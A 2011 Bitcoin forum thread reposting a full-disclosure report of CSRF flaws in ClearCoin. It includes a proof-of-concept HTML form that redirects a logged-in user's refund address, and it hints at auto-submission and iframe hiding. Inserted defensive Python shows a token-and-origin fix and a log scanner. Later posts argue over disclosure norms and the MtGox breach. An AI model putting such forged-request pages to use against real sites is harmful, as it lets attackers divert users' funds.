jrmithdobbs (OP)
Newbie
Offline
Activity: 67
Merit: 0
June 19, 2011, 10:26:45 PM (Last edit: June 21, 2011, 03:47:00 AM by jrmithdobbs)
From: Doug Huff <dhuff@jrbobdobbs.org>
Subject: Bitcoin fun day!
Date: Sun, 19 Jun 2011 16:54:28 -0500
Message-Id: <2B2201C1-E59F-47D4-BF67-08FDB0DDE386@jrbobdobbs.org>
To: full-disclosure@lists.grok.org.uk
Cc: Bitcoin Dev <bitcoin-development@lists.sourceforge.net>
This is an OpenPGP/MIME signed message (RFC 2440 and 3156), additionally S/MIME signed.
In light of recent events in the "bitcoin community" I have decided that private disclosure of issues is doing nothing but making them more prevalent.
In light of this decision I would like to report multiple CSRF vulnerabilities in http://clearcoin.appspot.com .
This set of CSRFs are particularly nasty since this is hosted on appspot and uses google account auth. So long as you stay logged into your google account you are vulnerable to this CSRF.
Things tested: Changing refund address. Releasing funds.
POC code (open this in any browser even from a local file):
==========
<html><head><title>test</title></head>
<body>
<form id="refund_address_form" action="https://clearcoin.appspot.com/set_refund_address" method="POST">
<label for="refund_address">Your bitcoin address:</label>
<input type="text" name="refund_address" id="refund_address" size="60" value="PUT ANY ADDRESS HERE" class="text ui-widget-content ui-corner-all" autofocus required placeholder="refund bitcoin address"/> (required)
</form>
</body>
</html>
==========
Javascript auto submittal, hiding in an iframe, and other obfuscation methods are left as an exercise to the list.
This site is run and maintained by Gavin Andresen, aka, the lead bitcoin maintainer.
You should know better Gavin.
--
Douglas Huff
http://sourceforge.net/mailarchive/forum.php?thread_name=2B2201C1-E59F-47D4-BF67-08FDB0DDE386%40jrbobdobbs.org&forum_name=bitcoin-development
Sorry Gavin. (Gavin has already pulled clearcoin offline to address the issue.)
Edit: Adding f-d link for posterity. http://lists.grok.org.uk/pipermail/full-disclosure/2011-June/081574.html
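The server-side fix the report above calls for, written here as an added example and not ClearCoin's own code: the POST handler accepts a refund-address change only when the request comes from the site's own origin (Origin header, or Referer as a fallback) and carries a per-session synchronizer token that a page on another origin cannot read. The handler, session and account dicts, and the attacker.example referer are all constructed for the demonstration.

```python
import hmac
import secrets
from urllib.parse import urlsplit

# The only origin allowed to submit the refund-address form.
SITE_ORIGIN = "https://clearcoin.appspot.com"


def new_csrf_token(session):
    """Mint a per-session token and keep the server-side copy in `session`
    (a hypothetical dict standing in for the real session store)."""
    token = secrets.token_hex(32)
    session["csrf_token"] = token
    return token


def render_refund_form(session):
    """Server-rendered form. The token sits in a hidden field that a page on
    another origin cannot read, so a forged copy of the form cannot carry it."""
    token = new_csrf_token(session)
    return (
        '<form id="refund_address_form" action="/set_refund_address" method="POST">'
        f'<input type="hidden" name="csrf_token" value="{token}"/>'
        '<input type="text" name="refund_address"/>'
        "</form>"
    )


def source_origin(headers):
    """Origin header if sent, else scheme://host of Referer, else None.
    A page opened from a local file sends neither, so it yields None."""
    origin = headers.get("Origin")
    if origin:
        return origin.rstrip("/")
    parts = urlsplit(headers.get("Referer", ""))
    if parts.scheme and parts.netloc:
        return f"{parts.scheme}://{parts.netloc}"
    return None


def handle_set_refund_address(headers, form, session, account):
    """Hypothetical POST handler. Returns (status, message) and only updates
    `account` when the request is same-origin AND carries the session's token;
    the cookie-based login alone is never enough."""
    if source_origin(headers) != SITE_ORIGIN:
        return 403, "cross-origin request rejected"
    expected = session.get("csrf_token", "")
    supplied = form.get("csrf_token", "")
    # Constant-time comparison so a wrong guess does not leak how much matched.
    if not expected or not hmac.compare_digest(expected.encode(), supplied.encode()):
        return 403, "missing or invalid csrf token"
    account["refund_address"] = form["refund_address"]
    return 200, "refund address updated"


def demo():
    """Replay the two cases: a forged cross-origin submission and the real form."""
    session, account = {}, {"refund_address": "ORIGINAL"}
    render_refund_form(session)  # a genuine page view mints the token
    # Forged: the victim's browser attaches the login cookie, but the request
    # comes from another origin and has no token field (constructed values).
    forged = handle_set_refund_address(
        {"Referer": "http://attacker.example/poc.html"},
        {"refund_address": "SOMEONE_ELSES_ADDRESS"}, session, account)
    # Genuine: same origin and the token the server just issued.
    genuine = handle_set_refund_address(
        {"Origin": SITE_ORIGIN},
        {"refund_address": "NEW_ADDRESS", "csrf_token": session["csrf_token"]},
        session, account)
    return forged[0], genuine[0], account["refund_address"]


if __name__ == "__main__":
    print(demo())  # (403, 200, 'NEW_ADDRESS')
```

Both checks are kept because each covers the other's gap: older browsers did not send Origin and some strip Referer, while the token is useless if an XSS bug on the same origin can read it.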
Durr
Newbie
Offline
Activity: 28
Merit: 0
June 19, 2011, 10:33:25 PM
Who trusts Gavin anyway?
Gavin Andresen
Legendary
Offline
Activity: 1652
Merit: 2301
Chief Scientist
June 19, 2011, 10:36:13 PM
Yes, don't trust me, please. I am human and will make mistakes.
The CSRF vulnerability on ClearCoin is fixed. I will be contacting any ClearCoin customers who have changed their refund addresses to make sure that they were not the victim of a CSRF attack.
How often do you get the chance to work on a potentially world-changing project?
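The follow-up Gavin describes, finding which refund-address changes need a call to the customer, as an added example that is not ClearCoin's code: it scans request-log lines for accepted POSTs to /set_refund_address whose Referer is not the site itself. The log lines are constructed and the Apache "combined" format with a referer field is an assumption about the log source.

```python
import re
from urllib.parse import urlsplit

SITE_HOST = "clearcoin.appspot.com"

# Apache "combined" format with a referer field (an assumption about the log
# source; adjust the regex for whatever the real front end writes).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Constructed sample lines, not real ClearCoin traffic.
SAMPLE_LOG = """\
203.0.113.5 - alice@example.com [19/Jun/2011:16:40:01 -0500] "GET /refund HTTP/1.1" 200 812 "https://clearcoin.appspot.com/" "Mozilla/5.0"
203.0.113.5 - alice@example.com [19/Jun/2011:16:40:20 -0500] "POST /set_refund_address HTTP/1.1" 302 0 "https://clearcoin.appspot.com/refund" "Mozilla/5.0"
198.51.100.7 - bob@example.com [19/Jun/2011:17:02:11 -0500] "POST /set_refund_address HTTP/1.1" 302 0 "http://forum.example/thread?id=1" "Mozilla/5.0"
198.51.100.9 - carol@example.com [19/Jun/2011:17:05:43 -0500] "POST /set_refund_address HTTP/1.1" 302 0 "-" "Mozilla/5.0"
198.51.100.2 - dave@example.com [19/Jun/2011:17:09:30 -0500] "POST /set_refund_address HTTP/1.1" 403 0 "http://forum.example/thread?id=1" "Mozilla/5.0"
"""


def parse_line(line):
    """Return the named fields of one log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def referer_host(referer):
    """Hostname from a Referer value; None when it is absent ('-' or empty)."""
    if referer in ("", "-"):
        return None
    return urlsplit(referer).hostname


def refund_changes_to_review(log_text):
    """Accepted POSTs to /set_refund_address whose Referer is not this site.
    A foreign host points at a cross-site submission; a missing Referer is
    ambiguous (file:// pages send none, but so do some privacy settings), so
    both classes are listed for follow-up rather than called confirmed."""
    flagged = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if not rec or rec["method"] != "POST" or rec["path"] != "/set_refund_address":
            continue
        if int(rec["status"]) >= 400:
            continue  # the server rejected it, nothing changed
        host = referer_host(rec["referer"])
        if host == SITE_HOST:
            continue
        reason = "no referer" if host is None else f"foreign referer {host}"
        flagged.append((rec["user"], rec["ts"], reason))
    return flagged


if __name__ == "__main__":
    for user, ts, reason in refund_changes_to_review(SAMPLE_LOG):
        print(f"{ts}  {user:<20}  {reason}")
```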
Andrew Vorobyov
June 19, 2011, 10:40:52 PM
You can make thousands of mistakes in web programming, but please!!! - don't fuck up with C++
jrmithdobbs (OP)
Newbie
Offline
Activity: 67
Merit: 0
June 19, 2011, 10:43:15 PM
Yes, don't trust me, please. I am human and will make mistakes.
The CSRF vulnerability on ClearCoin is fixed. I will be contacting any ClearCoin customers who have changed their refund addresses to make sure that they were not the victim of a CSRF attack.
Thank you for your timely response and correction of the issue.
done
Newbie
Offline
Activity: 56
Merit: 0
June 20, 2011, 12:05:34 AM
Great job guys
gigitrix
June 20, 2011, 12:55:25 AM
You can make thousands of mistakes in web programming, but please!!! - don't fuck up with C++
Hahah, never has a truer word been spoken!
Batouzo
Member
Offline
Activity: 70
Merit: 10
June 20, 2011, 12:56:32 AM
Who trusts Gavin anyway?
Well... the FBI? (conference)
unk
Member
Offline
Activity: 84
Merit: 10
June 20, 2011, 01:03:32 AM
this may sound petulant, and my apologies if it is, but i distinctly recall the user "s" pointing out in this forum the importance of cross-site request forgeries and the fact that many popular bitcoin-related websites were vulnerable to them. he (or she) then left the forum and deleted all his/her posts, having been pushed away by extreme libertarians.
this is another example of the tone of the forums posing a problem for the bitcoin community, which could benefit from more inclusiveness, diversity of opinion, and politeness. if people had listened to "s" rather than dismissing that user's concerns as somehow hostile to bitcoin because they didn't 'toe the line', many problems could have been addressed months ago.
NghtRppr
June 20, 2011, 01:16:32 AM
this may sound petulant, and my apologies if it is, but i distinctly recall the user "s" pointing out in this forum the importance of cross-site request forgeries and the fact that many popular bitcoin-related websites were vulnerable to them. he (or she) then left the forum and deleted all his/her posts, having been pushed away by extreme libertarians.
this is another example of the tone of the forums posing a problem for the bitcoin community, which could benefit from more inclusiveness, diversity of opinion, and politeness. if people had listened to "s" rather than dismissing that user's concerns as somehow hostile to bitcoin because they didn't 'toe the line', many problems could have been addressed months ago.
I take offense to lumping all of us libertarians together as if we are the problem. Please look over my post history and you will see that I simply don't engage in personal attacks or abusive behavior in general, even when viciously insulted. The people that are decrying anything that could devalue BTC are the people that are just into Bitcoin to make a few quick bucks. I'm in it for the long haul because I value economic freedom as a libertarian. I'd rather see the currency stabilize than make money. I have a source of income. I don't need to speculate. I also welcome disclosure of vulnerabilities because it puts pressure on administrators to fix the problem as well as notifies the community that they should think twice about trusting the keys to the kingdom without considering risk. Please rethink your opinion on libertarians because even when the speculators are long gone, we will still be here wanting to use this currency.
iCEBREAKER
Legendary
Offline
Activity: 2156
Merit: 1072
Crypto is the separation of Power and State.
June 20, 2011, 02:09:52 AM
this may sound petulant, and my apologies if it is, but i distinctly recall the user "s" pointing out in this forum the importance of cross-site request forgeries and the fact that many popular bitcoin-related websites were vulnerable to them. he (or she) then left the forum and deleted all his/her posts, having been pushed away by extreme libertarians.
this is another example of the tone of the forums posing a problem for the bitcoin community, which could benefit from more inclusiveness, diversity of opinion, and politeness. if people had listened to "s" rather than dismissing that user's concerns as somehow hostile to bitcoin because they didn't 'toe the line', many problems could have been addressed months ago.
I, too, Blame Ayn Rand for all evil in the world and especially on this forum. /s That's actually more lulzy than petulant. I think we've all learned some valuable lessons today, about boring web standards' XCHMLL bugs that cause HTXL->BTC overflows or whatever. And not using the same l/p. And due diligence.
"The difference between bad and well-developed digital cash will determine whether we have a dictatorship or a real democracy." David Chaum 1996
"Fungibility provides privacy as a side effect." Adam Back 2014
TriumVir
Newbie
Offline
Activity: 56
Merit: 0
June 20, 2011, 02:22:07 AM
Amateur hour all the way around.
unk
Member
Offline
Activity: 84
Merit: 10
June 20, 2011, 02:36:43 AM
I, too, Blame Ayn Rand for all evil in the world and especially on this forum.
'for some ridiculous and extreme attitudes among teenagers' is not the same thing as 'all the evil in the world'. but bitcoin2cash is right. i really just have a particular type of poster in mind. it's not everyone who happens to be a libertarian; it's the rabid, often teenage ones who think that any criticism of the bitcoin protocol must be motivated by a brainwashing from the 'state'.
I think we've all learned some valuable lessons today, about boring web standards' XCHMLL bugs that cause HTXL->BTC overflows or whatever.
these were not lessons to learn; these are obvious to anyone with even the slightest experience in systems security. as i said, a good critical user who visited the forum for a week pointed them out, specifically, along with a variety of other problems. either there's too much noise or too much complacency for people to listen or learn before the problems manifest themselves.
iCEBREAKER
Legendary
Offline
Activity: 2156
Merit: 1072
Crypto is the separation of Power and State.
June 20, 2011, 04:04:09 AM
i really just have a particular type of poster in mind. it's not everyone who happens to be a libertarian; it's the rabid, often teenage ones who think that any criticism of the bitcoin protocol must be motivated by a brainwashing from the 'state'.
Many teens have yet not learned to tolerate the ignorant hypocrisy of those whose knee jerk objections to bitcoin not only are specifically addressed by the design, but obviously apply to the fiat money created by the State. That's a good thing. I like people who stand up and vigorously defend their values and beliefs. If you, or the other guy who left, can't look past their enthusiasm, vehemence, and zeal that's your problem. Even a reasonable adult might get sick having to repeatedly point out that federal reserve notes are way more of a fake Ponzi rip-off scam than any form of cryptocash.
these were not lessons to learn; these are obvious to anyone with even the slightest experience in systems security. as i said, a good critical user who visited the forum for a week pointed them out, specifically, along with a variety of other problems. either there's too much noise or too much complacency for people to listen or learn before the problems manifest themselves.
Nice try, gotcha guy. But it turns out that the supposed MtGox "hack" was an inside job. It had NOTHING to do with XSRF, SQL, or whatever technical point the oversensitive guy (who ran away rather than debate mean, stinky libertarians) was previously belaboring.
unk
Member
Offline
Activity: 84
Merit: 10
June 20, 2011, 04:07:18 AM
Nice try, gotcha guy. But it turns out that the supposed MtGox "hack" was an inside job. It had NOTHING to do with XSRF, SQL, or whatever technical point the oversensitive guy (who ran away rather than debate mean, stinky libertarians) was previously belaboring.
mt. gox was, within the last week and by their own admission, vulnerable to cross-site request forgeries. i don't recall "s" ever saying anything about sql injection, which is harder to detect without access to the code. (it's not worth debating this if you're not a technical person yourself.)
iCEBREAKER
Legendary
Offline
Activity: 2156
Merit: 1072
Crypto is the separation of Power and State.
June 20, 2011, 04:54:36 AM
Nice try, gotcha guy. But it turns out that the supposed MtGox "hack" was an inside job. It had NOTHING to do with XSRF, SQL, or whatever technical point the oversensitive guy (who ran away rather than debate mean, stinky libertarians) was previously belaboring.
mt. gox was, within the last week and by their own admission, vulnerable to cross-site request forgeries. i don't recall "s" ever saying anything about sql injection, which is harder to detect without access to the code. (it's not worth debating this if you're not a technical person yourself.)
Nobody is debating whether the XSRF vulnerability existed any longer, as it was demonstrated on Friday night. It's been fixed and had nothing to do with the break-in, which was the fault of MtGox's finance auditor AND NOT THE RESULT OF XSRF, SQL, TROJANS, TEMPEST, OR WHATEVER YOUR BUDDY WAS MOANING ABOUT. Now the issue is that so many were so quick to point fingers immediately following the MtGox breach, without bothering to confirm or verify anything with the principals involved. You aren't the only "OMG we tried to warn them but they DINT LISEN" bozo who was proven wrong by tonight's interview. There are/were a lot of expert opinions, ie, wild guesses being thrown around. Spare us the "it's not worth debating this if you're not a technical person yourself" snobbery. You may rest assured that I understand the difference between a XSRF and SQL injection. I get paid to make damn sure such things keep running smoothly. I'm sure your e-peen is so massive it would stampede the women and scare the children, so please keep it private and to yourself.
unk
Member
Offline
Activity: 84
Merit: 10
June 20, 2011, 05:00:04 AM
You aren't the only "OMG we tried to warn them but they DINT LISEN" bozo who was proven wrong by tonight's interview. There are/were a lot of expert opinions, ie, wild guesses being thrown around.
i'm not clear what you think i said that has been 'proven wrong', but i believe you're mistaken.
Spare us the "it's not worth debating this if you're not a technical person yourself" snobbery. You may rest assured that I understand the difference between a XSRF and SQL injection. I get paid to make damn sure such things keep running smoothly.
I'm sure your e-peen is so massive it would stampede the women and scare the children, so please keep it private and to yourself.
this again is just the sort of childish response that i'm critiquing. you referred to 'XCHMLL bugs that cause HTXL->BTC overflows or whatever'; a reasonable inference from that kind of a comment is that you have little technical understanding of the concepts we're discussing. if that is not true, you can't fault me for picking up on an anti-intellectual mannerism you intentionally put forward.
iCEBREAKER
Legendary
Offline
Activity: 2156
Merit: 1072
Crypto is the separation of Power and State.
June 20, 2011, 05:11:59 AM
You aren't the only "OMG we tried to warn them but they DINT LISEN" bozo who was proven wrong by tonight's interview. There are/were a lot of expert opinions, ie, wild guesses being thrown around.
i'm not clear what you think i said that has been 'proven wrong', but i believe you're mistaken. Spare us the "it's not worth debating this if you're not a technical person yourself" snobbery. You may rest assured that I understand the difference between a XSRF and SQL injection. I get paid to make damn sure such things keep running smoothly.
I'm sure your e-peen is so massive it would stampede the women and scare the children, so please keep it private and to yourself.
this again is just the sort of childish response that i'm critiquing. you referred to 'XCHMLL bugs that cause HTXL->BTC overflows or whatever'; a reasonable inference from that kind of a comment is that you have little technical understanding of the concepts we're discussing. if that is not true, you can't fault me for picking up on an anti-intellectual mannerism you intentionally put forward.
It's not that hard: the interview tonight (did you watch it?) about the break-in proved that ALL the people who were claiming they knew the cause of the MtGox heist were WRONG. Your petulant lack of humor is far more childish than my poking fun at the idea of technobabble as a compelling explanation for the MtGox situation. Your humorless, grumpy inference regarding my technical understanding of the concepts at hand was not reasonable, especially given my previous posts and demonstrated hash rate.
unk
Member
Offline
Activity: 84
Merit: 10
June 20, 2011, 05:21:23 AM
It's not that hard: the interview tonight (did you watch it?) about the break-in proved that ALL the people who were claiming they knew the cause of the MtGox heist were WRONG.
and where do you think i ever claimed that i knew the cause of the problems on mt. gox? i wasn't even talking about them. note that we're in a discussion about a cross-site forgery problem on clearcoin. i brought up mt. gox only after you called me 'gotcha guy' and seemed to suggest they had never been vulnerable to such request-forgery problems. i know this is an internet forum and all, and reading comprehension may not be your strength, but it might be worth actually reading what i'm saying before criticising it, calling me a 'bozo', and referring to my 'e-peen'. grow up, please.
jrmithdobbs (OP)
Newbie
Offline
Activity: 67
Merit: 0
June 20, 2011, 05:42:16 AM
It's not that hard: the interview tonight (did you watch it?) about the break-in proved that ALL the people who were claiming they knew the cause of the MtGox heist were WRONG.
That interview proved nothing except that the rep of mtgox present said some things with no evidence presented except for their willingness to make public statements without seeking legal counsel first and that they do not understand basic technical concepts. Considering their recent track record of responding to (more like: not responding to) privately disclosed security issues. (It took *a week* for tux to respond to someone trying to report those csrfs. He only responded once it was made public. It was not confirmed friday. It was confirmed much earlier in the week.) The SQL injection issues that were fixed in the last few days on mtgox with no announcement or disclosure. Etc. Tux's behaviour is what prompted me to disclose this the way I did. I think going forward that all bitcoin-related security issues should get the full disclosure treatment to discourage another mtgox. (Really am sorry Gavin. I know you would have responded appropriately had this been privately disclosed.)